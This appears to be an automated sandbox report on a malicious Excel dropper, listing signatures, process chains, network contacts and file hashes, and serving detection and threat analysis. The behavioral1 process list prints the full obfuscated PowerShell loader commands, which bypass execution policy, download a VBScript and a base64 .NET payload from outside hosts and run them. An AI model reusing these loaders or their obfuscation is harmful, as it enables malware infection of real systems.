Malware Analysis Report

2024-12-07 16:45

Sample ID 241114-ceb1saskgv
Target f8136a20dbec93a03aaebaf7d36ff199.bin
SHA256 a817dfdce631969b109d59bb4f23ead01218c275f94dc04a11151cd9027f2333
Tags
defense_evasion discovery execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a817dfdce631969b109d59bb4f23ead01218c275f94dc04a11151cd9027f2333

Threat Level: Known bad

The file f8136a20dbec93a03aaebaf7d36ff199.bin was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution

Process spawned unexpected child process

Evasion via Device Credential Deployment

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Drops file in System32 directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Uses Volume Shadow Copy WMI provider

Uses Volume Shadow Copy service COM API

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Checks processor information in registry

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-14 01:58

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-14 01:58

Reported

2024-11-14 02:01

Platform

win7-20240903-en

Max time kernel

139s

Max time network

147s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1984 wrote to memory of 2240 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
PID 1984 wrote to memory of 2240 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
PID 1984 wrote to memory of 2240 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
PID 1984 wrote to memory of 2240 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
PID 2240 wrote to memory of 1004 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2240 wrote to memory of 1004 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2240 wrote to memory of 1004 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2240 wrote to memory of 1004 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2240 wrote to memory of 2580 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2240 wrote to memory of 2580 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2240 wrote to memory of 2580 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2240 wrote to memory of 2580 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2580 wrote to memory of 1512 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2580 wrote to memory of 1512 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2580 wrote to memory of 1512 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2580 wrote to memory of 1512 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2240 wrote to memory of 900 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WScript.exe
PID 2240 wrote to memory of 900 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WScript.exe
PID 2240 wrote to memory of 900 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WScript.exe
PID 2240 wrote to memory of 900 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WScript.exe
PID 900 wrote to memory of 2224 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 900 wrote to memory of 2224 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 900 wrote to memory of 2224 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 900 wrote to memory of 2224 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 276 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 276 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 276 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 276 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE

"C:\Windows\SysTeM32\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE" "powersheLL.Exe -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe ; IEx($(IEX('[SySTem.tEXT.eNcodINg]'+[cHAR]58+[cHar]58+'UTf8.gEtSTrinG([SYSTEm.CONvErt]'+[ChAR]0X3A+[cHar]58+'FrOmbaSe64sTrINg('+[chaR]0X22+'JGQzV3JwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJFckRlRmluaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJrdExTUVhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVYb1FHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJIbGxGLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsb3hDeHF1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdXUik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkJaZ1NrT0N3ZnQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpXYW1SYUx2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRkM1dycDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTY3L3hhbXBwL25jL3NlZXRoZWJlc3RvcHRpb25zdG91bmRlcnN0YW5kZmFzdHRoaW5nc3RvYmVnZXRiYWNrYmlzY3V0LnRJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0b3B0aW9uc3RvdW5kZXJzdGFuZGZhc3R0aGluZ3N0b2JlZ2V0LnZiUyIsMCwwKTtTdEFSdC1TbEVlUCgzKTtzdGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdG9wdGlvbnN0b3VuZGVyc3RhbmRmYXN0dGhpbmdzdG9iZWdldC52YlMi'+[ChAr]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lbcmpz1h.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC3E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBC3D.tmp"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHZlcmJPc0VwcmVmZVJlbmNlLnRvc3RySW5nKClbMSwzXSsnWCctam9JTicnKSgoJ2ZRSGltYWdlVXJsID0gb0xsaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT0yQWFfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblQnKydJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBvTGw7JysnZlFId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0RQPVKFCZHEXDABsonhadorldlYkNsaWUnKyduJysndDtmUUhpbWFnZUJ5JysndGVzID0gZlFId2ViQ2xpZW50LkRvd24nKydsb2FkRGF0YShmUUhpbWEnKydnZVVybCk7ZlFIaW1hJysnZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZlFIaW1hZ2VCeXRlcyk7ZlFIc3RhcnRGbGFnID0gb0xsPDxCQVNFNjRfU1RBUlQ+Pm9MbDtmUUhlbmRGbGFnID0gb0xsPDxCJysnQVMnKydFNjRfRU5EJysnPj5vTGw7ZlFIc3RhcnRJbmRleCA9JysnIGZRSGknKydtYWdlVGV4dC5JbmRleE9mKGZRSHN0YXJ0RmxhZyk7ZlFIZW5kSW5kJysnZXggPSAnKydmUUhpbWFnZVRleHQuSW5kZXhPZihmUUhlbmRGbGFnKTtmUUhzdGFydEluZGV4IC1nZSAwIC1hbmQgZlEnKydIZW5kSW5kZXggLWd0IGZRSHN0YXJ0SW5kZXg7ZlFIc3RhcnRJbmRleCArPSBmUUhzdGFydEZsYWcuTGVuZ3RoO2ZRSGInKydhc2U2NExlbmd0aCA9IGZRSGVuJysnZEluZGV4IC0gZlFIcycrJ3RhcnRJbmRleDtmJysnUUhiYXNlNjRDb21tYW5kID0gZlFIaW1hZ2VUZXh0LlN1YnN0cmluZyhmUUhzdGFydEluJysnZGV4LCBmUUhiYXNlNjRMZW5ndGgpO2ZRSGJhc2U2NFJldmVyc2VkID0gRQPVKFCZHEXDABsonhadorWpvaW4gKGZRSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAxaVEgRm9yRWFjaC1PYmplY3QgeyBmUUhfIH0pWy0xLi4tKGZRSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ZlFIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhmUScrJ0hiYXNlNjRSZXZlcnNlZCk7ZlFIbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGZRSGNvbW1hbmQnKydCeXRlcyk7ZlFIdmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChvTGxWQUlvTGwpO2ZRSHZhaU1ldGhvZC5JbnZva2UoZlFIbnVsbCwgQChvTGx0eHQuQVNGRVNSVy9jbi9wcG1heC83NjEuODcxLjY0Ljg5MS8vOnB0dGhvTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGFzcG5ldF9jb21waWxlcm9MbCwgb0xsZGVzYXRpdmFkb29MbCwgb0xsZGVzYXRpdmFkb29MbCxvTGxkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsb0xsZGVzYXRpdmFkb29MbCxvTGwnKydkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsJysnb0xsMW9MbCxvTGxkZXNhdGl2YWRvb0xsKSk7JykuckVwTGFjRSgoW2NoYXJdMTExK1tjaGFyXTc2K1tjaGFyXTEwOCksW3NUUklOZ11bY2hhcl0zOSkuckVwTGFjRSgoW2NoYXJdNDkrW2NoYXJdMTA1K1tjaGFyXTgxKSxbc1RSSU5nXVtjaGFyXTEyNCkuckVwTGFjRSgnZlFIJywnJCcpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command

Network

Country Destination Domain Proto
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 88.221.134.89:80 r10.o.lencr.org tcp
US 198.46.178.167:80 198.46.178.167 tcp
KR 221.146.204.133:443 4t.gg tcp
US 198.46.178.167:80 198.46.178.167 tcp
US 198.46.178.167:80 198.46.178.167 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.252.157:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:80 www.microsoft.com tcp

Files

memory/1848-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1848-1-0x0000000071EDD000-0x0000000071EE8000-memory.dmp

memory/1984-16-0x0000000002820000-0x0000000002822000-memory.dmp

memory/1848-17-0x0000000002DD0000-0x0000000002DD2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 9bd2efe99229919b8d6dc43d5e0f86fb
SHA1 f268f6e47bd589efc2797d88210ae4f659006118
SHA256 935aba64f09e60a6d07a9dabc1d8a65e6882a55ad57f84d5d9debdc3e8404636
SHA512 5149ea3429674631d8a62756ce106b6602350f0fb77d0e3816786a2a465f65a545557264bc573b4a0b8de79b3f4a8fcba6870806754feb71c609ebfe0fdc9eb8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

MD5 085de3695f14fff3f936f7ee9802ef13
SHA1 90a0b513bbf8d9173bcdaf402254c0701397b212
SHA256 ef90d8b12068a18a3579d0b963e581ede7bf9adde07b4454427a73e5f7bc0345
SHA512 714ceae2cc122eaf829023ee52ea9de770111ff7908bba9864ce63309ef6fe52f1ba759d0e10c4858c9be03510f9d264575d8e4acf49d7f5488b43a5829af5b5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

MD5 242d5065f90e2bc0c080bb9f6364c24c
SHA1 af40d248dbb2044abc0669d20e384838c48569a7
SHA256 6c5a2f0f49738a8fa4ce15c3fb8363d43d76a3cdc2dd6becc236af6e8a66d9ef
SHA512 acbabbf7f07be8f3a8e69f87ac56ca41719445666e153062b2d1aac68aace6bb12e58fc79822c9991eec227e3459556d8a31015ab2b56b155ae710d411520cd5

C:\Users\Admin\AppData\Local\Temp\CabB04C.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\seemybestpartaroundtheworldtogetmethingsfornewone[1].hta

MD5 fa26f1bca49d7fac5a0150c69f718b19
SHA1 d143c88ad2906d1a81c1f06c2d931d04970e0f9e
SHA256 fdfedc9927a45e7728387b3cc323023950295cb66c7273820bcf0d7d9e97d53c
SHA512 10b0b1c95b26d931857cce2011c6c8d7e40337a899419bdd3e8fd1f90ea8e6837c0dd5ff9f0a2ef5752c3bb2b618290772addf459d54bdf0fb8d036ec52614ec

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 ec542e4d46b26daaf2115589d2d48953
SHA1 894e579f6207e46b4e64690fba74c6bd068f5880
SHA256 f28c440db73e7190080197ce3ad513b4bc23c288358933c62abfee6b301a376e
SHA512 92299fb1f9c347a36039b6051e1099bddb412941bb6c24d622a32669ff675edd6f4c5d70707e2da6e49015f3501f87c5ab5f5d630cf11d417c8ad354bfded9c1

\??\c:\Users\Admin\AppData\Local\Temp\lbcmpz1h.cmdline

MD5 cb8e108e6b28166b19c6382308438455
SHA1 e0846644053dd9ff3721b442e930e00ad22b226d
SHA256 a6f4a5f5c97b55bd38b811aa7fc67e6f06681d55701364ca2684b44ffc1ef933
SHA512 5eeb82855d6d11c7d5bfaabf3791948f2445d600cfbdaf68f086a591c6792a1d3cca554f17c6bbbdf67d4ec0cbb8eb42f65a308c57fdcb7f4690145d3dd7bacf

\??\c:\Users\Admin\AppData\Local\Temp\lbcmpz1h.0.cs

MD5 0b9734ed54c4f41d0c94957b007eb3d5
SHA1 ebabbb2d826295a994ba691d921a4c7c5ed506d1
SHA256 36632527d6cce240e5833d6251632127fd95f085c35a3aa2a363be2f2cbc84fa
SHA512 d32ebc74674dd75c354a9b74324421a2a4af0a2d6feeb3735d3fab857fb488aaf8be88f4687299c614b6e70556b3980ba007ba02abb8e5e341a2cabccdd10b17

\??\c:\Users\Admin\AppData\Local\Temp\CSCBC3D.tmp

MD5 ae71002d54da4a838ee54e1d9a03431f
SHA1 08e033f18ec2af9fa51771fcd90becdd00c17701
SHA256 7742f85622894968c3d762da011c5ca288404bda0017890b34511fc11f40d981
SHA512 79dbbaec86c425541611b1eb5c24c898308739e17ba8582e2661f473f84ba30ba716efaaafe1dcfbafd108c37af03d462905810a8f5259e3326fac6ff8fefeda

C:\Users\Admin\AppData\Local\Temp\RESBC3E.tmp

MD5 72295721b8862079ce057e8bc89e00d8
SHA1 936668d2c6eafe8e3f5c677fb6c8956040e24a6c
SHA256 7295ec96a820d728b830db39c95ed62ef6539a3ff218551a377f62a6e16094e3
SHA512 8a3a883a88654538ee5cdfd8f665a68fbe8e231a2387379876235f2e3098653f4dcb81b41d1807ab3b25fddb3d98ee66be642fe9bd3d91b29290e8a234dffb0a

C:\Users\Admin\AppData\Local\Temp\lbcmpz1h.dll

MD5 757fc17bb70368acf40a1e6850a33a43
SHA1 3beb41c89425a1df4970c80443f6844669ca703b
SHA256 28edaa1e1730e70169b2084a5f60d80dee10f76c49495f3786a05488cd826448
SHA512 6b18bf4219ebe2d2b5d4eb2f0ef7ed8d8dc8b7c77ac4273f3ba4b6c9d1f42b2873bba3f9a36bd4c0e936cc88e68feacf8a09f202b22fcb5f83db5e37463f5a62

C:\Users\Admin\AppData\Local\Temp\lbcmpz1h.pdb

MD5 ee3aef4422bbc6f8ec2e989a5391e04e
SHA1 1aa909c3e43662a58446732b88cd3b558e6adcb3
SHA256 911055a81aa75b82921029368326e6798cd605720e29ba587e75ce48b9939def
SHA512 1b9a10fcb3145661f4d1fd407fd8eaa15e2ef65828437f927dcefb088f53e4f931c3e3816a24c22452fdeb00ea62353bd76b68ff1aca5c0747d0b0ff7d89fce4

memory/1848-60-0x0000000071EDD000-0x0000000071EE8000-memory.dmp

C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS

MD5 4f46597a54e903c400cac4db5a222ecb
SHA1 0a2f30da05a532bfbddaba3af235011d60db8fc8
SHA256 ba78e6d4f42b1aab53a731c9bd0820d2f0278170eb5ef92604f32e92cfcb8246
SHA512 ffac65a2a99fe7c3883bb82f5736dbcbcdd8e3d8cecd265fda76e7b7d07d266f1f0b11eaa3adcf714a7e50314d3e140e50799e5b52fe2494da05f504912f344a

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-14 01:58

Reported

2024-11-14 02:01

Platform

win10v2004-20241007-en

Max time kernel

145s

Max time network

158s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
